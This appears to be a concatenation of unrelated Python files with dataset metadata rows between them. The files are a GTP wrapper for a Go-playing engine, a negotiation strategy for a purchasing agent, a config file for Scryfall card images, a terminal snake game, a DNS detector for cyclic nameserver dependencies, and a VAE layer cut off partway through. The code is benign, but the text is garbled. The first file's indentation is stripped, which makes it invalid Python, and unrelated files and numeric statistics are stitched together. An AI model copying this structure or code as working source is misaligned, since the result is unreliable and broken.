def boardsize(self, size):
size = int(size)
if size != SIZE:
raise Exception("The board size in configuration is {0}x{0} but GTP asked to play {1}x{1}".format(SIZE, size))
return ""
def komi(self, komi):
# Don't check komi in GTP engine. The algorithm has learned with a specific
# komi that we don't have any way to influence after learning.
return ""
def parse_move(self, move):
if move.lower() == 'pass':
x, y = 0, SIZE
return x, y
else:
letter = move[0]
number = move[1:]
x = string.ascii_uppercase.index(letter)
if x >= 9:
x -= 1 # I is a skipped letter
y = int(number) - 1
x, y = x, SIZE - y - 1
return x, y
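
    # Example (assuming SIZE == 19): GTP "K10" parses to (x, y) == (9, 9),
    # because the column letter I is skipped and rows are stored top-down;
    # print_move(9, 9) maps back to "K10".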
def print_move(self, x, y):
x, y = x, SIZE - y - 1
if x >= 8:
x += 1 # I is a skipped letter
move = string.ascii_uppercase[x] + str(y + 1)
return move
def play(self, color, move):
announced_player = COLOR_TO_PLAYER[color]
assert announced_player == self.player
x, y = self.parse_move(move)
self.board, self.player = self.engine.play(color, x, y)
return ""
def genmove(self, color):
announced_player = COLOR_TO_PLAYER[color]
assert announced_player == self.player
x, y, policy_target, value, self.board, self.player, policy = self.engine.genmove(color)
self.player = self.board[0, 0, 0, -1] # engine updates self.board already
with open(self.logfile, 'a') as f:
f.write("PLAYER" + str(self.player) + '\n')
move_string = self.print_move(x, y)
result = move_string
return result
def clear_board(self):
self.board, self.player = game_init()
return ""
def parse_command(self, line):
tokens = line.strip().split(" ")
command = tokens[0]
args = tokens[1:]
method = getattr(self, command)
result = method(*args)
if not result.strip():
return "=\n\n"
return "= " + result + "\n\n"
def main():
model = load_best_model()
gtp_log = os.path.join(conf['ROOT_DIR'], conf['LOG_DIR'], conf['GTP_LOGFILE'])
engine = Engine(model, gtp_log)
with open(gtp_log, 'w') as f:
for line in sys.stdin:
f.write("<<<" + line)
result = engine.parse_command(line)
if result.strip():
sys.stdout.write(result)
sys.stdout.flush()
f.write("'''" + str(engine.player) + '\n')
f.write(">>>" + result)
f.flush()
if __name__ == "__main__":
main()
| 29.02439 | 122 | 0.567787 | 468 | 3,570 | 4.192308 | 0.267094 | 0.010194 | 0.026504 | 0.038736 | 0.123344 | 0.123344 | 0.086646 | 0.067278 | 0.067278 | 0.067278 | 0 | 0.00895 | 0.311485 | 3,570 | 122 | 123 | 29.262295 | 0.78926 | 0.065266 | 0 | 0.159574 | 0 | 0.010638 | 0.066066 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 1 | 0.159574 | false | 0.010638 | 0.085106 | 0.053191 | 0.404255 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f7f1ba54312fe0a72f93cca2bd80b9cecefceb | 8,783 | py | Python | EoT-Agents-Manifacturing-Marketplace/purchasing_agent_1/skills/fipa_negotiation/strategy.py | boschresearch/open-eot-agents | 234ca54b31db4915df03a16210be4f6cd765e09c | [
"Apache-2.0"
] | 3 | 2021-09-03T11:24:46.000Z | 2021-12-01T08:03:42.000Z | EoT-Agents-Manifacturing-Marketplace/purchasing_agent_1/skills/fipa_negotiation/strategy.py | boschresearch/open-eot-agents | 234ca54b31db4915df03a16210be4f6cd765e09c | [
"Apache-2.0"
] | 17 | 2021-09-20T07:39:09.000Z | 2022-03-22T12:00:22.000Z | EoT-Agents-Manifacturing-Marketplace/purchasing_agent_1/skills/fipa_negotiation/strategy.py | boschresearch/open-eot-agents | 234ca54b31db4915df03a16210be4f6cd765e09c | [
"Apache-2.0"
] | 1 | 2022-03-15T12:34:03.000Z | 2022-03-15T12:34:03.000Z | # Copyright (c) 2021 - for information on the respective copyright owner see the NOTICE file and/or the repository https://github.com/boschresearch/open-eot-agents.
#
# SPDX-License-Identifier: Apache-2.0
from typing import Any, Dict, List, Tuple
from aea.common import Address
from aea.exceptions import enforce
from aea.helpers.search.generic import SIMPLE_SERVICE_MODEL
from aea.helpers.search.models import (
Constraint,
ConstraintType,
Description,
Query,
)
from aea.helpers.transaction.base import Terms
from aea.skills.base import Model
from packages.bosch.contracts.service_directory.contract import ServiceDirectory
DEFAULT_IS_LEDGER_TX = True
DEFAULT_CONTRACT_ADDRESS = "0x0"
DEFAULT_DEPLOYER_ADDRESS = "0x0"
DEFAULT_MAX_NEGOTIATIONS = 2
DEFAULT_SEARCH_SERVICE_1 = {"id": "3D_printing_service", "max_tx_fee": 1, "max_unit_price": 10, "min_quantity": 1, "max_quantity": 4,
"search_query": {
"constraint_type": "==",
"search_key": "seller_service",
"search_value": "3D_printing_service",}}
DEFAULT_SEARCH_SERVICE_2 = {"id": "3DX_printing_service", "max_tx_fee": 1, "max_unit_price": 20, "min_quantity": 1, "max_quantity": 3,
"search_query": {
"constraint_type": "==",
"search_key": "seller_service",
"search_value": "3DX_printing_service",}}
class GenericStrategy(Model):
"""This class defines a strategy for the agent."""
def __init__(self, **kwargs: Any) -> None:
"""
Initialize the strategy of the agent.
:return: None
"""
ledger_id = kwargs.pop("ledger_id", None)
self._is_ledger_tx = kwargs.pop("is_ledger_tx", DEFAULT_IS_LEDGER_TX)
self.contract_id = str(ServiceDirectory.PUBLIC_ID)
self.contract_address = kwargs.pop("contract_address", DEFAULT_CONTRACT_ADDRESS)
self.deployer_address = kwargs.pop("deployer_address", DEFAULT_DEPLOYER_ADDRESS)
currency_id = kwargs.pop("currency_id", None)
self._max_negotiations = kwargs.pop("max_negotiations", DEFAULT_MAX_NEGOTIATIONS)
self._search_service_1 = kwargs.pop("search_service_1", DEFAULT_SEARCH_SERVICE_1)
self._search_service_2 = kwargs.pop("search_service_2", DEFAULT_SEARCH_SERVICE_2)
super().__init__(**kwargs)
self._ledger_id = (
ledger_id if ledger_id is not None else self.context.default_ledger_id
)
if currency_id is None:
currency_id = self.context.currency_denominations.get(self._ledger_id, None)
enforce(
currency_id is not None,
f"Currency denomination for ledger_id={self._ledger_id} not specified.",
)
self._currency_id = currency_id
self._is_searching = False
self._balance = 0
@property
def ledger_id(self) -> str:
"""Get the ledger id."""
return self._ledger_id
@property
def is_ledger_tx(self) -> bool:
"""Check whether or not tx are settled on a ledger."""
return self._is_ledger_tx
@property
def is_searching(self) -> bool:
"""Check if the agent is searching."""
return self._is_searching
@is_searching.setter
def is_searching(self, is_searching: bool) -> None:
"""Check if the agent is searching."""
enforce(isinstance(is_searching, bool), "Can only set bool on is_searching!")
self._is_searching = is_searching
@property
def balance(self) -> int:
"""Get the balance."""
return self._balance
@balance.setter
def balance(self, balance: int) -> None:
"""Set the balance."""
self._balance = balance
@property
def max_negotiations(self) -> int:
"""Get the maximum number of negotiations the agent can start."""
return self._max_negotiations
def get_services(self) -> Dict[str, str]:
"""
Get the services to be discovered.
:return: a dictionary of services
"""
self._services = {"search_service_1": self._search_service_1["id"], "search_service_2": self._search_service_2["id"]}
return self._services
def get_contract_terms(self) -> Terms:
"""
Get the contract terms.
:return: the terms of the contract
"""
terms = Terms(
ledger_id=self.ledger_id,
sender_address=self.context.agent_address,
counterparty_address=self.context.agent_address,
amount_by_currency_id={},
quantities_by_good_id={},
nonce="",
)
return terms
def get_service_query(self) -> Query:
"""
Get the service query of the agent.
:return: the query
"""
service_key_filter = Constraint(
self._search_service_1["search_query"]["search_key"],
ConstraintType(
self._search_service_1["search_query"]["constraint_type"],
self._search_service_1["search_query"]["search_value"],
),
)
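        # With the default config above this is effectively:
        #   Query([Constraint("seller_service", ConstraintType("==", "3D_printing_service"))])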
query = Query([service_key_filter], model=SIMPLE_SERVICE_MODEL)
return query
def is_acceptable_proposal(self, proposal: Description) -> bool:
"""
Check whether it is an acceptable proposal.
:return: whether it is acceptable
"""
result = (
all(
[
key in proposal.values
for key in [
"ledger_id",
"currency_id",
"price",
"service_id",
"quantity",
"tx_nonce",
]
]
)
and proposal.values["ledger_id"] == self.ledger_id
and proposal.values["price"] > 0
and proposal.values["quantity"] >= self._search_service_1["min_quantity"]
and proposal.values["quantity"] <= self._search_service_1["max_quantity"]
and proposal.values["price"]
<= proposal.values["quantity"] * self._search_service_1["max_unit_price"]
and proposal.values["currency_id"] == self._currency_id
and proposal.values["service_id"] == self._search_service_1["id"]
and isinstance(proposal.values["tx_nonce"], str)
and proposal.values["tx_nonce"] != ""
)
return result
def is_affordable_proposal(self, proposal: Description) -> bool:
"""
Check whether it is an affordable proposal.
:return: whether it is affordable
"""
if self.is_ledger_tx:
payable = proposal.values.get("price", 0) + self._search_service_1["max_tx_fee"]
result = self.balance >= payable
else:
result = True
return result
def terms_from_proposal(
self, proposal: Description, counterparty_address: Address
) -> Terms:
"""
Get the terms from a proposal.
        :param proposal: the proposal
        :param counterparty_address: the address of the counterparty
        :return: terms
"""
buyer_address = self.context.agent_addresses[proposal.values["ledger_id"]]
terms = Terms(
ledger_id=proposal.values["ledger_id"],
sender_address=buyer_address,
counterparty_address=counterparty_address,
amount_by_currency_id={
proposal.values["currency_id"]: -proposal.values["price"]
},
quantities_by_good_id={
proposal.values["service_id"]: proposal.values["quantity"]
},
is_sender_payable_tx_fee=True,
nonce=proposal.values["tx_nonce"],
fee_by_currency_id={proposal.values["currency_id"]: self._search_service_1["max_tx_fee"]},
)
return terms
#TODO: Check if this could be used in current use-case!
def get_acceptable_counterparties(
self, counterparties: Tuple[str, ...]
) -> Tuple[str, ...]:
"""
Process counterparties and drop unacceptable ones.
:return: list of counterparties
"""
valid_counterparties: List[str] = []
for idx, counterparty in enumerate(counterparties):
if idx < self.max_negotiations:
valid_counterparties.append(counterparty)
return tuple(valid_counterparties)
def successful_trade_with_counterparty(
self, counterparty: str, data: Dict[str, str]
) -> None:
"""
Do something on successful trade.
:param counterparty: the counterparty address
:param data: the data
        :return: None
"""
self.context.logger.info("trade with sender={} was sucessful!".format(counterparty)) | 35.703252 | 164 | 0.612205 | 986 | 8,783 | 5.173428 | 0.189655 | 0.053519 | 0.041168 | 0.038816 | 0.225838 | 0.149579 | 0.121545 | 0.083513 | 0.057636 | 0.043521 | 0 | 0.007803 | 0.284982 | 8,783 | 246 | 165 | 35.703252 | 0.804459 | 0.136855 | 0 | 0.10559 | 0 | 0 | 0.129786 | 0.003732 | 0 | 0 | 0.000829 | 0.004065 | 0 | 1 | 0.099379 | false | 0 | 0.049689 | 0 | 0.229814 | 0.024845 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f960a841a29c49b6bce21728d2e4a50058e8c9 | 755 | py | Python | lib/configurations.py | LeeHuangChenCS/Scryfall_TabletopSim_Project | 7dac1f8a3a83eb1008f56b3f9f37ab28cce21a02 | [
"CNRI-Python"
] | null | null | null | lib/configurations.py | LeeHuangChenCS/Scryfall_TabletopSim_Project | 7dac1f8a3a83eb1008f56b3f9f37ab28cce21a02 | [
"CNRI-Python"
] | null | null | null | lib/configurations.py | LeeHuangChenCS/Scryfall_TabletopSim_Project | 7dac1f8a3a83eb1008f56b3f9f37ab28cce21a02 | [
"CNRI-Python"
] | null | null | null | cache_folder = "Resources"
cache_filename = "cacheInfo.cpickle"
# image size to download: use either "small", "normal", "large"
imageSize = "large"
# the folder that all images will be downloaded to
imageFolder = "Resources/CardImages"
# the extention to use for downloading the images
downloadImageExtensions = ".jpg"
# decklist folder
decklistFolder = "DeckLists"
# empty json deck location
emptyDeckLoc = "Resources/emptyDeck.json"
# dummy json card location
dummyCardLoc = "Resources/dummyCard.json"
# dummy deck entry location
dummyEntry = "Resources/dummyDeckEntry.json"
# the url used for the backs of magic cards
BackURL = 'https://i.imgur.com/0lQuqfe.jpg'
# the location of the saved folder
savedFolderFile = "Resources/savedFolder.txt"
| 25.166667 | 63 | 0.768212 | 94 | 755 | 6.148936 | 0.659574 | 0.031142 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001541 | 0.140397 | 755 | 29 | 64 | 26.034483 | 0.88906 | 0.430464 | 0 | 0 | 0 | 0 | 0.469048 | 0.242857 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f9d6e64e8c230a309cfab603645d8f8e1a7046 | 2,710 | py | Python | snake4.py | stolk/ZeroToSnake | 0f883558967a758d2441ef969b3828c96700682a | [
"Unlicense"
] | 1 | 2017-12-21T00:47:58.000Z | 2017-12-21T00:47:58.000Z | snake4.py | stolk/ZeroToSnake | 0f883558967a758d2441ef969b3828c96700682a | [
"Unlicense"
] | null | null | null | snake4.py | stolk/ZeroToSnake | 0f883558967a758d2441ef969b3828c96700682a | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
#
# snake4.py adds food to the board.
import curses
import time
import random
# Our snake lives in a world of 15 rows of 25 characters.
world = [
"+-----------------------+",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"| |",
"+-----------------------+",
]
# Our snake is defined as a list of coordinates (row,col) where its body is.
# We start as a snake of length 3, traveling to the right.
snake_body = [
( 7,7 ), # The head on the right.
( 7,6 ),
( 7,5 ), # The tail on the left.
]
# The direction that the snake is traveling as delta for row and delta for col.
snake_drow = 0
snake_dcol = 1
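# (drow, dcol) = (0, 1) means the head moves one column to the right each
# tick; e.g. (-1, 0) would move it up one row instead.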
food = ( 7,20 )
def draw_board( screen, board ) :
for linenr, row in enumerate( board ):
line = "".join( row )
screen.addstr( linenr+1, 0, line )
# We move the snake by adding a new head, and clearing its old tail (unless it needs to grow.)
# Returns True if the snake died because of the move.
def move_snake() :
global snake_body
global food
# Figure out where the head of the snake will move to.
head_row, head_col = snake_body[ 0 ] # Current location.
head_row += snake_drow
head_col += snake_dcol
# Did the snake eat its own body?
if ( head_row, head_col ) in snake_body :
return True
# Did the snake eat the food?
ate_food = ( head_row, head_col ) == food
if ate_food :
# Spawn new food at a random location on the board.
        # Pick a random interior cell (rows 1..13 and cols 1..23 are inside
        # the fence); note it may still land on the snake's body.
        food = ( int(random.uniform(1,14)), int(random.uniform(1,24)) )
# Re-assemble the body with a new head.
snake_body = [ ( head_row, head_col ) ] + snake_body
if not ate_food :
snake_body.pop() # remove its old tail.
# Did we hit the fence?
if world[ head_row ][ head_col ] != ' ' :
return True
return False
def main( stdscr ):
died = False
while not died:
stdscr.clear()
stdscr.addstr( 0, 0, "Snake game. Ctrl-C to quit." )
# Build up the board: start with a copy of the empty world.
board = [ list(row) for row in world ]
# Place the snake on our board.
for idx, ( row, col ) in enumerate( snake_body ) :
symbol = '#' if idx > 0 else 'O'
board[ row ][ col ] = symbol
# Place the food on the board.
board[ food[0] ][ food[1] ] = '*'
# Now that we have set up the board, we should draw it on screen.
draw_board( stdscr, board )
stdscr.refresh()
# Now move the snake.
died = move_snake()
time.sleep( 0.2 )
curses.wrapper(main)
| 23.362069 | 94 | 0.553875 | 387 | 2,710 | 3.79845 | 0.338501 | 0.04898 | 0.037415 | 0.047619 | 0.031293 | 0.031293 | 0 | 0 | 0 | 0 | 0 | 0.01779 | 0.315498 | 2,710 | 115 | 95 | 23.565217 | 0.774663 | 0.357565 | 0 | 0.265625 | 0 | 0 | 0.236597 | 0.029138 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0 | 0.046875 | 0 | 0.140625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fae2a3aae524112dc57b558d41fdd95b973c04 | 13,279 | py | Python | CyclicDetector.py | EduardoATpt/CycleHunter | 50c17ab827ab7a9c98e677d5cd79b1500992ac8d | [
"BSD-2-Clause"
] | null | null | null | CyclicDetector.py | EduardoATpt/CycleHunter | 50c17ab827ab7a9c98e677d5cd79b1500992ac8d | [
"BSD-2-Clause"
] | null | null | null | CyclicDetector.py | EduardoATpt/CycleHunter | 50c17ab827ab7a9c98e677d5cd79b1500992ac8d | [
"BSD-2-Clause"
] | 1 | 2021-02-15T02:05:42.000Z | 2021-02-15T02:05:42.000Z | # new detector
import dns.rcode
import dns.rdatatype
import dns.resolver
import datetime
import json
import random
import multiprocessing
import argparse
import logging
import tqdm
from collections import defaultdict
from domutils import getparent
'''
1. Read the zone file; keep each entry with an NS record.

# Find TIMEOUT domains
2. For each domain d, loop over its NSSet.
3. For each NS in the NSSet, try to:
  * get A
  * get AAAA
4a. If any A/AAAA resolves, the domain is OK.
4b. If the whole NSSet is NXDOMAIN, the domain cannot be resolved (a
    different type of error).
4c. If A/AAAA resolves but the NSSet is not authoritative, it is out of the
    scope of this code.
4d. If all A/AAAA lookups time out, then we may be on to something.

# Map timed-out domains to cyclic dependencies
1. Loop through the domains above.
2. For each NS in the NSSet, get its parent auth server.
3. Ask the parent for the auth servers of these domains.
4. Compare 3 to 2 and see if they are in a cyclic dependency.

# TODO first
1. write a class for NS
2. write a class for NSSet
3. write a class for domain
'''
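
# Rough end-to-end usage (hypothetical file names; mirrors the __main__
# block at the bottom of this module):
#   map_nsset('nsset.txt', 'cycles.json', limit=1000, workers=5)
# reads one nameserver per line from the input file and writes the NSes that
# look stuck in a cyclic dependency, plus their parent-side NS sets, as JSON.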
class NS:
def __init__(self, servername):
self.serverName = servername
self.A = set()
self.AAAA = set()
self.NXDOMAIN = False
self.timeoutv4 = False
self.timeoutv6 = False
self.NOANSWERv4 = False
self.NOANSWERv6 = False
self.reachable = False
self.reachablev4 = False
self.reachablev6 = False
def IsReachable(self):
if not self.NXDOMAIN:
if len(self.A) > 0 or len(self.AAAA) > 0:
return True
else:
return False
def fetch_glue(ns):
temp_ns = NS(ns)
try:
answer = dns.resolver.resolve(ns, 'A')
response = answer.response
# print(type(response))
rcode = response.rcode()
        if rcode == dns.rcode.NOERROR:
            temp_ns.reachable = True
            temp_ns.reachablev4 = True
            temp_ns.A = set(str(addr) for addr in response.answer)
        elif rcode == dns.rcode.NXDOMAIN:
temp_ns.NXDOMAIN = True
except dns.resolver.Timeout:
temp_ns.timeoutv4 = True
except dns.resolver.NoAnswer:
temp_ns.NOANSWERv4 = True
except dns.resolver.NXDOMAIN:
temp_ns.NXDOMAIN = True
# now, check v6 only if v4 does not work
if not temp_ns.reachable and (temp_ns.NOANSWERv4 or temp_ns.timeoutv4):
try:
answer = dns.resolver.resolve(ns, 'AAAA')
response = answer.response
# print(type(response))
rcode = response.rcode()
            if rcode == dns.rcode.NOERROR:
                temp_ns.reachable = True
                temp_ns.reachablev6 = True
                temp_ns.AAAA = set(str(addr) for addr in response.answer)
            elif rcode == dns.rcode.NXDOMAIN:
temp_ns.NXDOMAIN = True
except dns.resolver.Timeout:
temp_ns.timeoutv6 = True
except dns.resolver.NoAnswer:
temp_ns.NOANSWERv6 = True
except dns.resolver.NXDOMAIN:
temp_ns.NXDOMAIN = True
return temp_ns
def getParentNSes(k):
# get the parent
parent = getparent(k)
toBeRet = []
try:
try:
answer = dns.resolver.resolve(parent, 'NS')
response = answer.response
# print(type(response))
rcode = response.rcode()
# parent is valid
if rcode == dns.rcode.NOERROR:
try:
localA = response.answer
for k in localA:
for addr in k.items:
try:
tempNS = addr.target
toBeRet.append(str(tempNS))
except Exception as e:
logging.error(f"{k}: NS from parent has No A - {e}")
except Exception as e:
logging.error(f'{k}: auth server has no NS, reason {e}')
pass
elif rcode == dns.rcode.NXDOMAIN:
logging.info(f"{parent} NXDOMAIN")
toBeRet.append(-1)
elif rcode == dns.rcode.SERVFAIL:
logging.info(f"{parent} SERVFAIL")
except Exception as e:
logging.error(f"{k}: NS from parent has failed - {e}")
# print(type(e))
return 'ERROR'
except Exception as e:
logging.error(f"{k}: failed to retrieve NS answers - {e}")
return toBeRet
def getNS(parent):
    # query the NS records of the given (parent) zone
toBeRet = []
try:
answer = dns.resolver.resolve(parent, 'NS')
response = answer.response
# print(type(response))
rcode = response.rcode()
# parent is valid
if rcode == dns.rcode.NOERROR:
try:
localA = response.answer
for k in localA:
for addr in k.items:
try:
tempNS = addr.target
toBeRet.append(str(tempNS))
except Exception as e:
logging.error(f"{k}: failed getting ns getNS() for {parent} - {e}")
except Exception as e:
logging.error(f"{parent}: no NS - {e}")
pass
elif rcode == dns.rcode.NXDOMAIN:
logging.error(f"Parent {parent} does not exist")
toBeRet.append(-1)
except Exception as e:
return 'TIMEOUT'
return toBeRet
def getA(ns):
address = []
try:
answer = dns.resolver.resolve(ns, 'A')
response = answer.response
# print(type(response))
rcode = response.rcode()
if rcode == dns.rcode.NOERROR:
try:
localA = response.answer
for k in localA:
for addr in k.items:
address.append(str(addr))
except Exception as e:
logging.error(f"{ns}: no A, reason {e}")
pass
elif rcode == dns.rcode.NXDOMAIN:
address.append(-1)
except Exception as e:
logging.error(f"Querying A for {ns} produced exception {e}")
return address
def getSOA(ns):
# try to get a SOA, if it fails return ERROR
try:
answer = dns.resolver.resolve(ns, 'SOA')
response = answer.response
# print(type(response))
rcode = response.rcode()
if rcode == dns.rcode.NOERROR:
return 0
elif rcode == dns.rcode.NXDOMAIN:
return -1
elif rcode == dns.rcode.SERVFAIL:
return "ERROR"
except Exception as e:
logging.error(f"Querying SOA for {ns} generated an exception {e}")
return 'ERROR'
def retrieveNSFromParent(fqdn, ip_from_auth_server):
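    # Query the given authoritative (parent) server's IP directly over UDP so
    # the delegation NS records show up in the authority section, instead of
    # getting a recursive answer from a local resolver.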
queryType = dns.rdatatype.NS
try:
ip_from_auth_server = ip_from_auth_server[0]
except Exception as e:
logging.error(f"Using {ip_from_auth_server} triggered an exception {e}")
query = dns.message.make_query(fqdn, queryType)
ret = defaultdict(list)
try:
response = dns.query.udp(query, ip_from_auth_server, timeout=5)
except Exception as e:
logging.error(f"Failed {fqdn} query to {ip_from_auth_server} - {e}")
response = "NA"
if response != "NA":
if len(response.answer) > 0:
logging.error(f"shoot, {fqdn} has answer at parent")
elif len(response.answer) == 0 and len(response.authority) > 0:
rcode = response.rcode()
if rcode == dns.rcode.NOERROR:
for item in response.authority:
if item.rdtype == dns.rdatatype.SOA:
# print("has soa, all GOOD")
return 'SOA'
elif item.rdtype == dns.rdatatype.NS:
for addr in item.items:
namez = str(item.name)
ret[namez].append(str(addr))
return ret
elif rcode == dns.rcode.NXDOMAIN:
return 'NXDOMAIN'
def probe_ns(nsname):
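    # Returns (nsname, result): result is the parent-side NS mapping (a dict)
    # when nsname times out via normal resolution but its parent still returns
    # an NS delegation (a cyclic-dependency suspect); otherwise None.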
localSoa = getSOA(nsname)
res = None
    # only analyze NSes whose SOA lookup failed (SERVFAIL or exception)
if localSoa == 'ERROR':
logging.error(f"{nsname} has error with SOA query")
isOK = False
timeOUtButNotFromParent = False
bailiStatus = False
tempTest = getparent(nsname)
if tempTest != "" and len(tempTest.split(".")) < 2:
# print(str(tempTest))
logging.info(f"{nsname} is already at the top (tld), skip it")
else:
parentNS = getParentNSes(nsname)
logging.info(f"the parent domain of {nsname} is {parentNS}")
if isinstance(parentNS, list):
                # check whether at least one NS is in bailiwick
sp2 = nsname.split(".")
baili = ''
for ww in range(1, len(sp2) - 1):
baili = baili + "." + sp2[ww]
if baili[0] == ".":
baili = baili[1:]
for e in parentNS:
logging.info(f"{nsname} has bailiwick {baili} and nameserver {e}")
if baili in e:
logging.info(f"Result: {nsname} is fine has NS in bailiwick {e}")
bailiStatus = True
break
elif parentNS == "ERROR":
tempP = getparent(nsname)
tempP = getparent(tempP)
if len(tempP) > 0:
if tempP[-1] != '.':
tempP = tempP + "."
else:
print(f"tempP is {tempP}")
parentNS = getNS(tempP)
timeOUtButNotFromParent = True
logging.info(f"{nsname} has timed out via normal resolution")
if not bailiStatus:
for singleNS in parentNS:
if not isOK:
tempA = getA(singleNS)
if tempA != -1:
tempNSParent = retrieveNSFromParent(nsname, tempA)
# we only add domains here if they timeout
if timeOUtButNotFromParent and isinstance(tempNSParent, dict):
res = tempNSParent
logging.info(f"Result: {nsname} has been added")
isOK = True
elif tempNSParent == 'SOA':
isOK = True
logging.info(f"Result: {nsname} has SOA (is fine)")
# do nothing domain is ok
elif tempNSParent == 'NXDOMAIN':
isOK = True
logging.info(f"Result: {nsname} IS NXDOMAIN")
return nsname, res
def probeNSes(setOfNSes, workers=5):
results = dict()
ns_total = len(setOfNSes)
counter = 0
with multiprocessing.Pool(processes=workers) as pool:
for nsname, probe_res in tqdm.tqdm(pool.imap_unordered(probe_ns, setOfNSes, chunksize=15), total=ns_total):
counter += 1
if probe_res is not None:
results[nsname] = probe_res
return results
def readFAST(filename):
with open(filename, 'r') as f:
nsset = set(line.strip() for line in f.readlines())
return nsset
'''
A domain is considered cyclic when at least one of its NS records
points to another NS/CNAME (creating a resolution dependency loop). '''
def map_nsset(nsset_file, output_file, limit=None, workers=5):
logging.info('start reading zone file')
before = datetime.datetime.now()
nsRecords = readFAST(nsset_file)
logging.info('end reading zone file')
after = datetime.datetime.now()
diff = (after - before).seconds
logging.info(f"It took {diff} seconds to read the file")
logging.info("start detect cycles")
logging.info(f"the number of nsRecords is {len(nsRecords)}")
if limit is None:
# now shuffle the set
lRecords = list(nsRecords)
random.shuffle(lRecords)
else:
        lRecords = random.sample(list(nsRecords), limit)
timeOutNSes = probeNSes(lRecords, workers=workers)
with open(output_file, 'w') as fp:
json.dump(timeOutNSes, fp)
print("und jetz? ")
if __name__ == '__main__':
# Setup logging if called from command line
logging.basicConfig(filename='nameserver-mapper.log',
level=logging.INFO, format="%(asctime)s ns_mapper: %(levelname)s %(message)s")
# Read the command line arguments
argparser = argparse.ArgumentParser(
description="Fetches the glue records for the list of nameservers in the input file")
argparser.add_argument('nsset_file', type=str, help="File with the list of nameservers")
argparser.add_argument('output_file', type=str, help="File to save the mapping")
argparser.add_argument('--limit', type=int, required=False, default=None,
help="Restrict the list of nameserver, use for testing")
args = argparser.parse_args()
map_nsset(args.nsset_file, args.output_file, limit=args.limit)
| 32.626536 | 115 | 0.548535 | 1,544 | 13,279 | 4.669689 | 0.209197 | 0.015811 | 0.025243 | 0.029958 | 0.30957 | 0.297365 | 0.254092 | 0.222607 | 0.185437 | 0.158946 | 0 | 0.007426 | 0.361096 | 13,279 | 406 | 116 | 32.706897 | 0.842409 | 0.043603 | 0 | 0.342657 | 0 | 0 | 0.120445 | 0.005351 | 0 | 0 | 0 | 0.002463 | 0 | 1 | 0.041958 | false | 0.01049 | 0.041958 | 0 | 0.15035 | 0.006993 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fc2a55d65e03413a6c5d1e057a56b832440a05 | 14,037 | py | Python | networks/autoencoder/vae.py | annachen/dl_playground | f263dc16b4f0d91f6d33d94e678a9bbe2ace8913 | [
"MIT"
] | null | null | null | networks/autoencoder/vae.py | annachen/dl_playground | f263dc16b4f0d91f6d33d94e678a9bbe2ace8913 | [
"MIT"
] | null | null | null | networks/autoencoder/vae.py | annachen/dl_playground | f263dc16b4f0d91f6d33d94e678a9bbe2ace8913 | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
from dl_playground.networks.layers import mlp, cnn
from dl_playground.networks.autoencoder import losses
class VAELayer(tf.keras.layers.Layer):
"""Variational Autoencoder layer.
Note: sigma here is the covariance matrix; it's equivalent to
variance in univariate Gaussian, and not std.
Parameters
----------
n_input_channels : int
n_vars : int
encoder_filters : [int]
Number of filters for the encoder. Does not include the last
layer where the network predicts the mean and variance.
decoder_filters : [int]
Number of filters for the decoder. Does not include the last
layer where the network reconstruct the inputs.
reconstruction_type : str
'ce' for cross entropy, or 'mse' for mean square error
kl_type : str
'close' for close-form calculation, 'mc' for monte-carlo
beta : float
The weight on the KL term
kl_add_step : int
The step to add in the KL term loss with weight beta
output_is_logit : bool
summary_image_shape : [int, int, int] | None
name : str
"""
def __init__(
self,
n_input_channels,
n_vars,
encoder_filters,
decoder_filters,
reconstruction_type='ce',
kl_type='close',
beta=1.0,
kl_add_step=0,
output_is_logit=True,
summary_image_shape=None,
name='',
):
super(VAELayer, self).__init__()
self._n_vars = n_vars
self._enc_filters = encoder_filters
self._dec_filters = decoder_filters
enc_filters = encoder_filters + [n_vars * 2]
self._encoder = mlp.MLP(
filters=enc_filters,
last_layer_act_fn='linear',
)
dec_filters = decoder_filters + [n_input_channels]
self._decoder = mlp.MLP(
filters=dec_filters,
last_layer_act_fn='linear',
)
self._recons_type = reconstruction_type
self._kl_type = kl_type
self._beta = beta
self._kl_add_step = kl_add_step
self._output_is_logit = output_is_logit
self._summary_image_shape = summary_image_shape
self._name = name
def encode(self, inputs, training=None):
# inputs: (B, n_feats)
x = self._encoder(inputs, training=training)
# (B, n_vars)
means = x[:, :self._n_vars]
# (B, n_vars)
